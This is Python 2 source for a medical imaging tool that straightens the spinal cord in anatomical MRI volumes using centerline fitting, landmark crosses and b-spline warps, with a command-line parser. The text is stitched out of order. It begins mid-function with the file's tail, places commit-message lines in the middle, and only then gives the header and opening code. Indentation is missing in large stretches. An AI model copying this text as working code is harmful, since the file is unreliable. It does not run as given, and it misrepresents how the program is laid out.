#sct.run('sct_apply_transfo -i tmp.landmarks_curved.nii.gz -o tmp.landmarks_curved_rigid.nii.gz -d tmp.landmarks_straight.nii.gz -w tmp.curve2straight_rigid.txt -x nn', verbose)
Transform(input_filename="tmp.landmarks_curved.nii.gz", source_reg="tmp.landmarks_curved_rigid.nii.gz", output_filename="tmp.landmarks_straight.nii.gz", warp="tmp.curve2straight_rigid.txt", interp="nn", verbose=verbose).apply()
if verbose == 2:
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x_centerline_fit, y_centerline_fit, z_centerline, zdir='z')
ax.plot([coord.x for coord in landmark_curved],
[coord.y for coord in landmark_curved],
[coord.z for coord in landmark_curved], '.')
ax.plot([coord.x for coord in landmark_straight],
[coord.y for coord in landmark_straight],
[coord.z for coord in landmark_straight], 'r.')
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
ax.plot([coord.x for coord in landmark_curved_rigid],
[coord.y for coord in landmark_curved_rigid],
[coord.z for coord in landmark_curved_rigid], 'b.')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
if (self.use_continuous_labels == 1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
landmark_curved_rigid, landmark_straight = ProcessLabels.remove_label_coord(landmark_curved_rigid, landmark_straight, symmetry=True)
# Writting landmark curve in text file
landmark_straight_file = open("LandmarksRealStraight.txt", "w+")
for i in landmark_straight:
landmark_straight_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_straight_file.close()
# Writting landmark curve in text file
landmark_curved_file = open("LandmarksRealCurve.txt", "w+")
for i in landmark_curved_rigid:
landmark_curved_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_curved_file.close()
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
# This stands to avoid overlapping between landmarks
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 2...', verbose)
label_process = ProcessLabels(fname_label="tmp.landmarks_curved_rigid.nii.gz",
fname_output=["tmp.landmarks_curved_rigid.nii.gz", "tmp.landmarks_straight.nii.gz"],
fname_ref="tmp.landmarks_straight.nii.gz", verbose=verbose)
label_process.process('remove-symm')
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# remove padding for straight labels
if crop == 1:
ImageCropper(input_file="tmp.landmarks_straight.nii.gz", output_file="tmp.landmarks_straight_crop.nii.gz", dim="0,1,2", bmax=True, verbose=verbose).crop()
pass
else:
sct.run('cp tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
#sct.run('isct_ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# !!! DO NOT USE sct.run HERE BECAUSE isct_ComposeMultiTransform OUTPUTS A NON-NULL STATUS !!!
cmd = 'isct_ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight_crop.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
sct.printv(cmd, verbose, 'code')
sct.run(cmd, self.verbose)
#commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
sct.printv('\nEstimate b-spline transformation: straight --> curve...', verbose)
if (self.use_continuous_labels==1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
cmd = 'isct_ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R '+file_anat+ext_anat+' -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
sct.printv(cmd, verbose, 'code')
#commands.getstatusoutput(cmd)
sct.run(cmd, self.verbose)
# Apply transformation to input image
sct.printv('\nApply transformation to input image...', verbose)
Transform(input_filename=str(file_anat+ext_anat), source_reg="tmp.anat_rigid_warp.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp=interpolation_warp, warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
# compute the error between the straightened centerline/segmentation and the central vertical line.
# Ideally, the error should be zero.
# Apply deformation to input image
sct.printv('\nApply transformation to centerline image...', verbose)
# sct.run('sct_apply_transfo -i '+fname_centerline_orient+' -o tmp.centerline_straight.nii.gz -d tmp.landmarks_straight_crop.nii.gz -x nn -w tmp.curve2straight.nii.gz')
Transform(input_filename=fname_centerline_orient, source_reg="tmp.centerline_straight.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp="nn", warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
#c = sct.run('sct_crop_image -i tmp.centerline_straight.nii.gz -o tmp.centerline_straight_crop.nii.gz -dim 2 -bzmax')
from msct_image import Image
file_centerline_straight = Image('tmp.centerline_straight.nii.gz', verbose=verbose)
coordinates_centerline = file_centerline_straight.getNonZeroCoordinates(sorting='z')
mean_coord = []
from numpy import mean
for z in range(coordinates_centerline[0].z, coordinates_centerline[-1].z):
temp_mean = [coord.value for coord in coordinates_centerline if coord.z == z]
if temp_mean:
mean_value = mean(temp_mean)
mean_coord.append(mean([[coord.x * coord.value / mean_value, coord.y * coord.value / mean_value] for coord in coordinates_centerline if coord.z == z], axis=0))
# compute error between the input data and the nurbs
from math import sqrt
x0 = file_centerline_straight.data.shape[0]/2.0
y0 = file_centerline_straight.data.shape[1]/2.0
count_mean = 0
for coord_z in mean_coord:
if not isnan(sum(coord_z)):
dist = ((x0-coord_z[0])*px)**2 + ((y0-coord_z[1])*py)**2
self.mse_straightening += dist
dist = sqrt(dist)
if dist > self.max_distance_straightening:
self.max_distance_straightening = dist
count_mean += 1
self.mse_straightening = sqrt(self.mse_straightening/float(count_mean))
except Exception as e:
sct.printv('WARNING: Exception during Straightening:', 1, 'warning')
print 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
sct.printv('\nGenerate output file (in current folder)...', verbose)
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz', 'warp_curve2straight.nii.gz', verbose) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz', 'warp_straight2curve.nii.gz', verbose) # warping field
if fname_output == '':
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', file_anat+'_straight'+ext_anat, verbose) # straightened anatomic
else:
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', fname_output, verbose) # straightened anatomic
# Remove temporary files
if remove_temp_files:
sct.printv('\nRemove temporary files...', verbose)
sct.run('rm -rf '+path_tmp, verbose)
sct.printv('\nDone!\n', verbose)
sct.printv('Maximum x-y error = '+str(round(self.max_distance_straightening,2))+' mm', verbose, 'bold')
sct.printv('Accuracy of straightening (MSE) = '+str(round(self.mse_straightening,2))+' mm', verbose, 'bold')
# display elapsed time
elapsed_time = time.time() - start_time
sct.printv('\nFinished! Elapsed time: '+str(int(round(elapsed_time)))+'s', verbose)
sct.printv('\nTo view results, type:', verbose)
sct.printv('fslview '+fname_straight+' &\n', verbose, 'info')
if __name__ == "__main__":
    # Command-line entry point: declare the options, parse argv, configure a
    # SpinalCordStraightener accordingly and run the straightening pipeline.
    parser = Parser(__file__)
    parser.usage.set_description("This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal cord was straightened.")
    # Declarative description of every command-line option; each entry is
    # handed verbatim to parser.add_option().
    option_specs = [
        dict(name="-i",
             type_value="image_nifti",
             description="input image.",
             mandatory=True,
             example="t2.nii.gz"),
        dict(name="-c",
             type_value="image_nifti",
             description="centerline or segmentation.",
             mandatory=True,
             example="centerline.nii.gz"),
        dict(name="-p",
             type_value="int",
             description="amount of padding for generating labels.",
             mandatory=False,
             example="30",
             default_value=30),
        dict(name="-o",
             type_value="file_output",
             description="output file",
             mandatory=False,
             default_value='',
             example="out.nii.gz"),
        dict(name="-x",
             type_value="multiple_choice",
             description="Final interpolation.",
             mandatory=False,
             example=["nn", "linear", "spline"],
             default_value="spline"),
        dict(name="-r",
             type_value="multiple_choice",
             description="remove temporary files.",
             mandatory=False,
             example=['0', '1'],
             default_value='1'),
        dict(name="-a",
             type_value="multiple_choice",
             description="Algorithm for curve fitting.",
             mandatory=False,
             example=["hanning", "nurbs"],
             default_value="hanning"),
        dict(name="-f",
             type_value="multiple_choice",
             description="Crop option. 0: no crop, 1: crop around landmarks.",
             mandatory=False,
             example=['0', '1'],
             default_value=1),
        dict(name="-v",
             type_value="multiple_choice",
             description="Verbose. 0: nothing, 1: basic, 2: extended.",
             mandatory=False,
             example=['0', '1', '2'],
             default_value=1),
        dict(name="-params",
             type_value=[[','], 'str'],
             description="""Parameters for spinal cord straightening. Separate arguments with ",".\nuse_continuous_labels : 0,1. Default = False\nalgo_fitting: {hanning,nurbs} algorithm for curve fitting. Default=hanning\nbspline_meshsize: <int>x<int>x<int> size of mesh for B-Spline registration. Default=5x5x10\nbspline_numberOfLevels: <int> number of levels for BSpline interpolation. Default=3\nbspline_order: <int> Order of BSpline for interpolation. Default=2\nalgo_landmark_rigid {rigid,xy,translation,translation-xy,rotation,rotation-xy} constraints on landmark-based rigid pre-registration""",
             mandatory=False,
             example="algo_fitting=nurbs,bspline_meshsize=5x5x12,algo_landmark_rigid=xy"),
        dict(name="-cpu-nb",
             type_value="int",
             description="Number of CPU used for straightening. 0: no multiprocessing. If not provided, it uses all the available cores.",
             mandatory=False,
             example="8"),
    ]
    for spec in option_specs:
        parser.add_option(**spec)
    arguments = parser.parse(sys.argv[1:])
    # Mandatory arguments drive the constructor.
    sc_straight = SpinalCordStraightener(arguments["-i"], arguments["-c"])
    # Optional flags that map one-to-one onto an attribute after a type cast.
    direct_options = [("-r", "remove_temp_files", int),
                      ("-p", "padding", int),
                      ("-x", "interpolation_warp", str),
                      ("-o", "output_filename", str),
                      ("-a", "algo_fitting", str),
                      ("-f", "crop", int),
                      ("-v", "verbose", int),
                      ("-cpu-nb", "cpu_number", int)]
    for flag, attribute, cast in direct_options:
        if flag in arguments:
            setattr(sc_straight, attribute, cast(arguments[flag]))
    if "-params" in arguments:
        # Advanced parameters arrive as "key=value" strings; unknown keys are
        # silently ignored, matching the parser's documented keys above.
        param_setters = {'algo_fitting': ('algo_fitting', str),
                         'bspline_meshsize': ('bspline_meshsize', str),
                         'bspline_numberOfLevels': ('bspline_numberOfLevels', str),
                         'bspline_order': ('bspline_order', str),
                         'algo_landmark_rigid': ('algo_landmark_rigid', str),
                         'all_labels': ('all_labels', int),
                         'use_continuous_labels': ('use_continuous_labels', int),
                         'gapz': ('gapz', int)}
        for entry in arguments['-params']:
            parts = entry.split('=')
            if parts[0] in param_setters:
                attribute, cast = param_setters[parts[0]]
                setattr(sc_straight, attribute, cast(parts[1]))
    sc_straight.straighten()
REF: temporarily setting continuous labels option because it is not compiled on Linux. See issue #415
Former-commit-id: 61802b1437e3cf33eb57eb69a9c8ba970edeffb5 [formerly 46be0ea17c75ecbe99517b401295b5301048e7bf]
Former-commit-id: acb38691f0f14f832aa987032489f3e2a021d104
Former-commit-id: 5f68bdfb93d7885bb80957401fc937b5fdc23fff
#!/usr/bin/env python
#
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-09-01
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
from msct_parser import Parser
from sct_label_utils import ProcessLabels
from sct_crop_image import ImageCropper
from nibabel import load, Nifti1Image, save
from numpy import array, asarray, append, insert, linalg, mean, sum, isnan
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
from sct_apply_transfo import Transform
import sct_utils as sct
from msct_smooth import smoothing_window, evaluate_derivative_3D
from sct_orientation import set_orientation
from msct_types import Coordinate
import copy_reg
import types
def _pickle_method(method):
    """
    Pickle support for instance methods (Python 2), used so that
    multiprocessing can serialize bound-method workers.

    Author: Steven Bethard (author of argparse)
    http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
    """
    name = method.im_func.__name__
    target = method.im_self
    klass = method.im_class
    # Reproduce Python's name mangling for "private" methods: __foo on class
    # Bar is stored as _Bar__foo in the class dict.
    if name.startswith('__') and not name.endswith('__'):
        mangled_prefix = klass.__name__.lstrip('_')
        if mangled_prefix:
            name = '_' + mangled_prefix + name
    return _unpickle_method, (name, target, klass)
def _unpickle_method(func_name, obj, cls):
"""
Author: Steven Bethard
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
# Register the custom (un)pickler so that bound methods survive pickling —
# required when multiprocessing.Pool dispatches self.worker_landmarks_curved.
copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
def smooth_centerline(fname_centerline, algo_fitting='hanning', type_window='hanning', window_length=80, verbose=0):
    """
    Fit a smooth curve through a binary centerline/segmentation volume.

    :param fname_centerline: path to the centerline/segmentation (RPI orientation).
    :param algo_fitting: 'hanning' (sliding-window smoothing) or 'nurbs' (b-spline fit).
    :param type_window: window type for the 'hanning' algorithm (see msct_smooth;
                        e.g. 'flat', 'hanning', 'hamming', 'bartlett', 'blackman').
    :param window_length: smoothing window length (converted to voxels via pz).
    :param verbose: verbosity level forwarded to sct.printv.
    :return: tuple (x_fit, y_fit, z_fit, x_deriv, y_deriv, z_deriv) describing the
             fitted centerline and its derivatives, one value per non-empty slice.
    """
    sct.printv('\nSmooth centerline/segmentation...', verbose)
    # get dimensions and voxel sizes of the input volume
    nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline)
    # open centerline volume (renamed from 'file' to avoid shadowing the builtin)
    centerline_image = load(fname_centerline)
    data = centerline_image.get_data()
    # keep only the slices that actually contain centerline voxels.
    # N.B. len(z_centerline) = nz_nonz can be smaller than nz in case the centerline is smaller than the input volume
    z_centerline = [iz for iz in range(0, nz, 1) if data[:, :, iz].any()]
    nz_nonz = len(z_centerline)
    x_centerline = [0 for iz in range(0, nz_nonz, 1)]
    y_centerline = [0 for iz in range(0, nz_nonz, 1)]
    # get center of mass of the centerline/segmentation for every non-empty slice
    sct.printv('.. Get center of mass of the centerline/segmentation...', verbose)
    for iz in range(0, nz_nonz, 1):
        x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(array(data[:, :, z_centerline[iz]]))
    sct.printv('.. Smoothing algo = '+algo_fitting, verbose)
    if algo_fitting == 'hanning':
        # 2D smoothing
        sct.printv('.. Windows length = '+str(window_length), verbose)
        # change to array
        x_centerline = asarray(x_centerline)
        y_centerline = asarray(y_centerline)
        # Smooth the curve; window length is scaled by the z voxel size
        x_centerline_smooth = smoothing_window(x_centerline, window_len=window_length/pz, window=type_window, verbose=verbose)
        y_centerline_smooth = smoothing_window(y_centerline, window_len=window_length/pz, window=type_window, verbose=verbose)
        # convert to list final result
        x_centerline_fit = x_centerline_smooth.tolist()
        y_centerline_fit = y_centerline_smooth.tolist()
        z_centerline_fit = z_centerline
        # release the (potentially large) volume before computing derivatives
        del data
        # get derivative of the fitted curve
        x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = evaluate_derivative_3D(x_centerline_fit, y_centerline_fit, z_centerline, px, py, pz)
        x_centerline_fit = asarray(x_centerline_fit)
        y_centerline_fit = asarray(y_centerline_fit)
        z_centerline_fit = asarray(z_centerline_fit)
    elif algo_fitting == 'nurbs':
        from msct_smooth import b_spline_nurbs
        x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_nurbs(x_centerline, y_centerline, z_centerline, nbControl=None, verbose=verbose)
    else:
        sct.printv('ERROR: wrong algorithm for fitting', 1, 'error')
    return x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
class SpinalCordStraightener(object):
    def __init__(self, input_filename, centerline_filename, debug=0, deg_poly=10, gapxy=20, gapz=15, padding=30, interpolation_warp='spline', rm_tmp_files=1, verbose=1, algo_fitting='hanning', type_window='hanning', window_length=50, crop=1, output_filename=''):
        """
        Configure a spinal cord straightening run.

        :param input_filename: anatomical image to straighten.
        :param centerline_filename: centerline or segmentation of the spinal cord.
        :param debug: 1 to run with hard-coded debug inputs (see straighten()).
        :param deg_poly: maximum degree of polynomial function for fitting centerline.
        :param gapxy: size of the landmark cross in x and y direction (voxels).
        :param gapz: gap between landmarks along z (voxels).
        :param padding: padding added around the volume so landmarks outside the FOV are kept.
        :param interpolation_warp: final interpolation when applying the warp ('nn', 'linear', 'spline').
        :param rm_tmp_files: 1 to delete the temporary working folder at the end.
        :param verbose: 0: nothing, 1: basic, 2: extended (plots).
        :param algo_fitting: centerline fitting algorithm, 'hanning' or 'nurbs'.
        :param type_window: smoothing window type (see msct_smooth).
        :param window_length: smoothing window length.
        :param crop: 1 to crop the straightened output around the landmarks.
        :param output_filename: output file name ('' = derive from input name).
        """
        self.input_filename = input_filename
        self.centerline_filename = centerline_filename
        self.output_filename = output_filename
        self.debug = debug
        self.deg_poly = deg_poly  # maximum degree of polynomial function for fitting centerline.
        self.gapxy = gapxy  # size of cross in x and y direction for the landmarks
        self.gapz = gapz  # gap between landmarks along z voxels
        self.padding = padding  # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
        self.interpolation_warp = interpolation_warp
        self.remove_temp_files = rm_tmp_files  # remove temporary files
        self.verbose = verbose
        self.algo_fitting = algo_fitting  # 'hanning' or 'nurbs'
        self.type_window = type_window  # !! for more choices, edit msct_smooth. Possibilities: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
        self.window_length = window_length
        self.crop = crop
        self.cpu_number = None  # number of worker processes; None lets Pool use all cores, 0 disables multiprocessing
        self.bspline_meshsize = '5x5x10'  # mesh size for the b-spline displacement field estimation
        self.bspline_numberOfLevels = '3'  # number of levels for b-spline interpolation
        self.bspline_order = '2'  # order of the b-spline used for interpolation
        self.algo_landmark_rigid = 'translation-xy'  # constraint on landmark-based rigid pre-registration
        self.all_labels = 1  # when >= 1, also create landmarks on slices between crosses
        self.use_continuous_labels = 0  # 1: use text-file landmarks (continuous coordinates) instead of voxel labels
        # accuracy metrics filled in by straighten()
        self.mse_straightening = 0.0
        self.max_distance_straightening = 0.0
    def worker_landmarks_curved(self, arguments):
        """
        Compute landmark coordinates for one slice of the curved centerline.

        Designed to run inside a multiprocessing.Pool: ``arguments`` is a tuple
        (iz, shared) where ``shared`` bundles the cross slice indices, the
        fitted centerline and its derivatives.  For slices listed in iz_curved
        it returns the center landmark plus 4 cross landmarks lying in the
        plane orthogonal to the centerline at distance self.gapxy; for other
        slices it returns a single landmark (when self.all_labels >= 1).

        :return: (iz, list of Coordinate), or None on KeyboardInterrupt.
        """
        try:
            iz = arguments[0]
            iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline = arguments[1]
            temp_results = []
            if iz in iz_curved:
                # calculate d so that the orthogonal plane is ax+by+cz+d=0,
                # with (a,b,c) the centerline tangent at this slice
                a = x_centerline_deriv[iz]
                b = y_centerline_deriv[iz]
                c = z_centerline_deriv[iz]
                x = x_centerline_fit[iz]
                y = y_centerline_fit[iz]
                z = z_centerline[iz]
                d = -(a * x + b * y + c * z)
                # print a,b,c,d,x,y,z
                # set coordinates for landmark at the center of the cross
                coord = Coordinate([0, 0, 0, 0])
                coord.x, coord.y, coord.z = x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz]
                temp_results.append(coord)
                # set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
                cross_coordinates = [Coordinate(), Coordinate(), Coordinate(), Coordinate()]
                cross_coordinates[0].y = y_centerline_fit[iz]
                cross_coordinates[1].y = y_centerline_fit[iz]
                # set x and z coordinates for landmarks +x and -x, forcing the landmark to be in the orthogonal plane and the distance landmark/curve to be gapxy
                x_n = Symbol('x_n')
                cross_coordinates[1].x, cross_coordinates[0].x = solve(
                    (x_n - x) ** 2 + ((-1 / c) * (a * x_n + b * y + d) - z) ** 2 - self.gapxy ** 2, x_n)  # x for -x and +x
                cross_coordinates[0].z = (-1 / c) * (a * cross_coordinates[0].x + b * y + d)  # z for +x
                cross_coordinates[1].z = (-1 / c) * (a * cross_coordinates[1].x + b * y + d)  # z for -x
                # set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
                cross_coordinates[2].x = x_centerline_fit[iz]
                cross_coordinates[3].x = x_centerline_fit[iz]
                # set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
                y_n = Symbol('y_n')
                cross_coordinates[3].y, cross_coordinates[2].y = solve(
                    (y_n - y) ** 2 + ((-1 / c) * (a * x + b * y_n + d) - z) ** 2 - self.gapxy ** 2, y_n)  # y for -y and +y
                cross_coordinates[2].z = (-1 / c) * (a * x + b * cross_coordinates[2].y + d)  # z for +y
                cross_coordinates[3].z = (-1 / c) * (a * x + b * cross_coordinates[3].y + d)  # z for -y
                for coord in cross_coordinates:
                    temp_results.append(coord)
            else:
                # non-cross slice: single landmark on the centerline (value set later by the caller)
                if self.all_labels >= 1:
                    temp_results.append(
                        Coordinate([x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz], 0], mode='continuous'))
            return iz, temp_results
        except KeyboardInterrupt:
            # worker interrupted: return None so the pool can shut down cleanly
            return
def worker_landmarks_curved_results(self, results):
sorted(results, key=lambda l: l[0])
self.results_landmarks_curved = []
landmark_curved_value = 0
for iz, l_curved in results:
for landmark in l_curved:
landmark.value = landmark_curved_value
self.results_landmarks_curved.append(landmark)
landmark_curved_value += 1
def straighten(self):
# Initialization
fname_anat = self.input_filename
fname_centerline = self.centerline_filename
fname_output = self.output_filename
gapxy = self.gapxy
gapz = self.gapz
padding = self.padding
remove_temp_files = self.remove_temp_files
verbose = self.verbose
interpolation_warp = self.interpolation_warp
algo_fitting = self.algo_fitting
window_length = self.window_length
type_window = self.type_window
crop = self.crop
# start timer
start_time = time.time()
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
sct.printv(path_sct, verbose)
if self.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
fname_anat = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/anat_rpi.nii' #path_sct+'/testing/sct_testing_data/data/t2/t2.nii.gz'
fname_centerline = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/centerline_rpi.nii' # path_sct+'/testing/sct_testing_data/data/t2/t2_seg.nii.gz'
remove_temp_files = 0
type_window = 'hanning'
verbose = 2
# check existence of input files
sct.check_file_exist(fname_anat, verbose)
sct.check_file_exist(fname_centerline, verbose)
# Display arguments
sct.printv('\nCheck input arguments...', verbose)
sct.printv(' Input volume ...................... '+fname_anat, verbose)
sct.printv(' Centerline ........................ '+fname_centerline, verbose)
sct.printv(' Final interpolation ............... '+interpolation_warp, verbose)
sct.printv(' Verbose ........................... '+str(verbose), verbose)
sct.printv('', verbose)
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp, verbose)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp, verbose)
sct.run('cp '+fname_centerline+' '+path_tmp, verbose)
# go to tmp folder
os.chdir(path_tmp)
try:
# Change orientation of the input centerline into RPI
sct.printv('\nOrient centerline to RPI orientation...', verbose)
fname_centerline_orient = file_centerline+'_rpi.nii.gz'
set_orientation(file_centerline+ext_centerline, 'RPI', fname_centerline_orient)
# Get dimension
sct.printv('\nGet dimensions...', verbose)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
sct.printv('.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz), verbose)
sct.printv('.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm', verbose)
# smooth centerline
x_centerline_fit, y_centerline_fit, z_centerline, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = smooth_centerline(fname_centerline_orient, algo_fitting=algo_fitting, type_window=type_window, window_length=window_length,verbose=verbose)
# Get coordinates of landmarks along curved centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along curved centerline...', verbose)
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy. In voxel space!!!
# find z indices along centerline given a specific gap: iz_curved
nz_nonz = len(z_centerline)
nb_landmark = int(round(float(nz_nonz)/gapz))
if nb_landmark == 0:
nb_landmark = 1
if nb_landmark == 1:
iz_curved = [0]
else:
iz_curved = [i*gapz for i in range(0, nb_landmark - 1)]
iz_curved.append(nz_nonz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
# landmark_curved initialisation
# landmark_curved = [ [ [ 0 for i in range(0, 3)] for i in range(0, 5) ] for i in iz_curved ]
landmark_curved = []
### TODO: THIS PART IS SLOW AND CAN BE MADE FASTER
### >>=====================================================================================================
worker_arguments = (iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline)
if self.cpu_number != 0:
from multiprocessing import Pool
arguments_landmarks = [(iz, worker_arguments) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
pool = Pool(processes=self.cpu_number)
pool.map_async(self.worker_landmarks_curved, arguments_landmarks, callback=self.worker_landmarks_curved_results)
pool.close()
try:
pool.join() # waiting for all the jobs to be done
if self.results_landmarks_curved:
landmark_curved = self.results_landmarks_curved
else:
raise ValueError('ERROR: no curved landmarks constructed...')
except KeyboardInterrupt:
print "\nWarning: Caught KeyboardInterrupt, terminating workers"
pool.terminate()
sys.exit(2)
except Exception as e:
print 'Error during straightening on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
sys.exit(2)
else:
landmark_curved_temp = [self.worker_landmarks_curved((iz, worker_arguments)) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
landmark_curved_value = 0
for iz, l_curved in landmark_curved_temp:
for landmark in l_curved:
landmark.value = landmark_curved_value
landmark_curved.append(landmark)
landmark_curved_value += 1
# Get coordinates of landmarks along straight centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along straight centerline...', verbose)
# landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
landmark_straight = []
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
# TODO: DO NOT APPROXIMATE CURVE --> LINE
if nb_landmark == 1:
iz_straight = [0 for i in range(0, nb_landmark+1)]
else:
iz_straight = [0 for i in range(0, nb_landmark)]
# print iz_straight,len(iz_straight)
iz_straight[0] = iz_curved[0]
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
z_centerline[iz_curved[index]] - z_centerline[iz_curved[index-1]] ]
# compute norm of this vector
norm_vector_centerline = linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline, 0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
landmark_curved_value = 1
for iz in range(min(iz_curved), max(iz_curved)+1, 1):
